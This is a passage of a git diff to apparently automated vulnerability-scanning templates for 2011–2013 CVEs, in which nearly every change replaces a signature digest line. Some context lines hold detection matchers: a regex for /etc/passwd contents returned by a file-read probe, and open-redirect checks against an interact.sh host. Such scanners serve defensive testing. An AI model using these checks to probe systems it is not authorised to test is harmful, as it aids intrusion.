490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc54ac25bae7f3d0876f30aa9fb8800f5d6c36ad89fbdc467b19abe6adce7ee102210097102e3aa4222ba9586f8537a69a955c66fa6e99b7e017c1fab3fb3287ccedc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index c1ddb90003..4d7dc872a1 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c46ac4d506d810715279cb2fc743fd7a9e3113cfb0b8d83b32f1481e48f48c2c0221008f18720cfdf2ca2a4860386a4b10dfdae5296fbf17f1496b8d0ec261ff5e0156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index c1e41eb263..731de64f2d 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009040bc705006390698b4760bf5d68599fa44e8cd4d06e85d1c53f6d78a66bd9022100dad78daa7c9a9543e18b8cce2f178325d4a18cf5db8fe2c2dab043196bea3e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index c20a0b9cc0..5e57c93228 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db36b1f058c7168f5f8f94f9effb32d1f4c99661d18f96567059bab4e3ec0da80220306d6b230632c77476d53991becda742dc1895da400324ad45d58f94930ed72a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index af3473daeb..742f2d0ceb 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index d13df930f1..09462b8d17 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -51,4 +51,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 4dfc679b6d..135e8a4833 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220522c81df4d838763aea8850f058981a255d7d59675fdb4c02bbdb06969a0ad83022023f0320748d1a58fedaf54253d38c438cff763b3401e447409b7a5d3f520ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 30bc5aedd9..b1856cb394 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f83de4045e23f0aca5040e8aed543ca527c91a15cc2cae8b296ef058dd566b0c02202bb3500a508e65323ec114d0126118c5b4ac2949d083bdee74e4b216a01ec3d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index fa5f475e5c..3fd885384f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2d8bf5d9480ea46483ac3aaaced8689aad71b8a211c5fd6d4a46d99c8e57eb5022100a79b8aec839add3b1c2180ff47f3be3e75701ceed4efe24247d9f4b77d793ed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index f43ff4cd7c..f1a4e9b17b 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021aa179c04ce2a829ef44ba257c42d88cbde9a43eba43b3b07972b29379e757502201f591e5f16db499bbe949d543c95bbde9e5f13caac80365ebfd8d99eba1a4be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 8633d31758..8ef215d300 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072425cfa2e69f5fa975af9f2e3a07d7fb421d28e5e3a6ef9bf4fb15dcd35bb82022062abc830f020b69a5b77fdae924fcab7f7cbd217c9dc1fbbb1eebe9affc4c9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 7e1ccbaa8c..357b300c5a 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e50430794e085ca63102b35b09c53e606d6053f7a358289dbb8a1dab676590b1022012914006ad07c047eaf7c2383f800f1e5dc232a9f738f5497822f03a9a28f876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 871de16bef..4323081301 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099f50866d74ee7d1871049c1a234874fd8a1df1db316942d76ccb8bcb1e8f064022100aae0853112ff4ae4e6bccc269ed1dca993e734d09a3a75aaae9880afa793b6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index b65085a63e..736305b9e2 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206799f52e48485817e413edc30bd4f359218ec597770780417e46ddcd8b00e00602207a128007973d0e474c073c18ad434eb21153116741ec63ad256b3e003bae78cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 89b6adbacb..57a2db83c7 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b96c6c74e4798235cec35053af8066d4dc6794a43e3df0b61f63109567e9189022100c8cd5a0b80864664a9fdf6bc321b718f5c0ff878c5350698f3aaa6393a671d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 5dc025d5ce..904bfb7219 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c6a4cabb72bde21bb132b44816b1bd64c1146b68963391fc45f78f2a847cb35022100eba1ae097bcc852f6d363e8f7d8fd65ced366197f06c5f1967617a378dd2752f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 102f0e9039..286a713a33 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f513fcbb707f6870b597e07bdde31074079404931037f69b23312866186588cf022100cffc9642a1750c8be27cb6de66c1984e527cb08df8261a53c592a6909deeeb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index b2cd77da3a..4c49828d04 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3a84923297dce515a989c9a43b3bee4c8f3c31fdfb93e2d763a77022f59bf51022061e6935843ad22eb54f312956180a70d53cc44408b116d5002ef457535087934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 8b7ad35ea2..0a9a358534 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df385e30d328b80da4b6c9904af41285b8b741ca53a993dad0e0890bd2a2f15502203fd8dcce02a5490e27f62698143778bf2a7d93367779818b553ffa4a81cc41bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 9535d2cef9..dadef786a4 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -48,4 +48,4 @@ http: part: body words: - '{{md5(string)}}' -# digest: 490a0046304402201ac0c2b72933df8c0fb7ef1c5a6a19a79cd40e76379881895be285e80251e69102203260f22d356f293b8ba1f047f27246d4f8c53067e6d42af2772d64392ea8fa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022ce5c4f17e4d8fc33d21bc60cf909dfcbb5c85217e1c7fa201caac4702e7d140221008912f28136b2b7554af51f8c82f896a076d16087aa6b5bff6027c4075a4937da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ec84cf8a73..5426e57f12 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009352954dcdd74fb838167e01395be39d74dca52243c96bf249d09954d7922ba5022100faeed378840240fe1acf3ed021365ac3f1acc04610e0c477fdb951466c280ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 740b647a0f..e3f4c43eca 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a152c975bd407714f7ee31557ef230986900c9b1c6332fc65085667dde221124022100afe88e47680ff10d649c0598333468b836589978fc76a76ec954cc6615ee1dd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 88efcb3730..2f32796650 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -67,4 +67,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2b755657c831d182f3e083f1324c8f181ec2a70e19c6017b6c30531c751ffe8022100f1c6303b12279e4b5b7352781958ff2324fd79bc2d862b7b06be52f1e41ee698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index f7f1623cb0..a6e3c72ed6 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a5643ac451046ed36a4bd0abee8e4625b5b9aaab446c88ecdc2de6123ace8ca022100d81885691908ee4848f60a645025945bbb6be535fe1e02995ba96597161ac6fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 19515405fd..f82681390a 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1bea933ca3d1732f9ad83368f4cf377156a4bddad1d3c2423e222138422395e02206fd3624c38c3ea36b4d70f18c985bb3e78b1a2f851339fa0e1983173d7ddc32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 5cf6c3ca28..15b4b7efcd 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f8f92c2922899207b46b0a7414d8ae6906729368cc5236e2709a80e69c61fa302201b58818ce7172c2d55376f5399cc320d825a21d5e47e73801a0e651c60b21217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 0338057e99..b7c2900d20 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6b1194c6ae8f5320d7a56775f9cb797dc6c5814de345683c601db5630265a47022100e97d9a7120eecbc820e2306076e3f6814f97f68476d720af764153f521d12892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 1fd009f975..accdf40bdd 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea7b17222b76afe635b0afb07df36cbbd4a0ddc64064490c057e48d693516932022025d9e8f9fd8c306ad62e0aab881c916004e64d1fffb0880f9348ad1246c89af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index f890c57174..21229c39db 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206053a67e4c75600835c22ae91ef4fd397c90fa9b2694c0503f97ba099eb9a0d5022100a8640797cc7a3ee57fe391de4fdb176fcc3441b0d320382db505ade82f522a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 095685c3f8..2b1431c800 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ec2fe2c080364c2725038246ec86b302494760c76487831383fe67a5752edbe0220430c9fbcc6a09954031a1058ff6bfc3e4ec9108aff02ebc4a0ab7af0f744647e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 6b48c50ead..62f047c214 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c29af02d64c2d710b335c5a8a86f05e6a9ddc754b21dc4a9f83dedce88c9984f0220277108a1e059287ea4decddab0aac3bcb4a99dd35876e104b2919c01eab48837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 4fa2b42211..36789d4340 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d919be78f24b6399d013ac974a5f6befc623e0d4e201fc5c1974b38cd8d146710220035ecd90eb365025b639d5c0660a56a44aac430567c209e137a67c272279b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 013dd3ec0a..10b2cf7c8c 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd2aa86d10e6be5f1738aa796ffd9c92e8353df18f5d595923b6318568db4058022069941042036744dbd5b17fd869b34cab85848f1db8fa9df127a07d51dcd9765a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 100e36e4a3..a7dce5184f 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c0a7c8038a6a1b54303fadd95ed235b6ceb902a3d4d0f9b5013c8c70f423ee8022100829d06644ac58eb979bf3a10cc48bc0a375cf7498a367a4207bc921527238603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 00c3842261..742f976a69 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff8a98ddb1c2c308eb08b8d79fc1dc2fe5b594fdb7d25398afd47cbbddafda5e02210082fa401f641a39d159006d7f9126437f76c703ab1a812e64c444e6bc06c8f261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 64ccc8c25b..0898a2f4d1 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -64,4 +64,4 @@ http: - 200 - 400 condition: or -# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e84e436f1f441c80631181ac85badd1fc9886b8d08455a5a08c4780e3cd957dd022100bb8d247e5e75816b9cc487a75474b8e7feef363cfaa59c81b7fc8e9eec73b8de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 37be99a04c..5a20bcae54 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 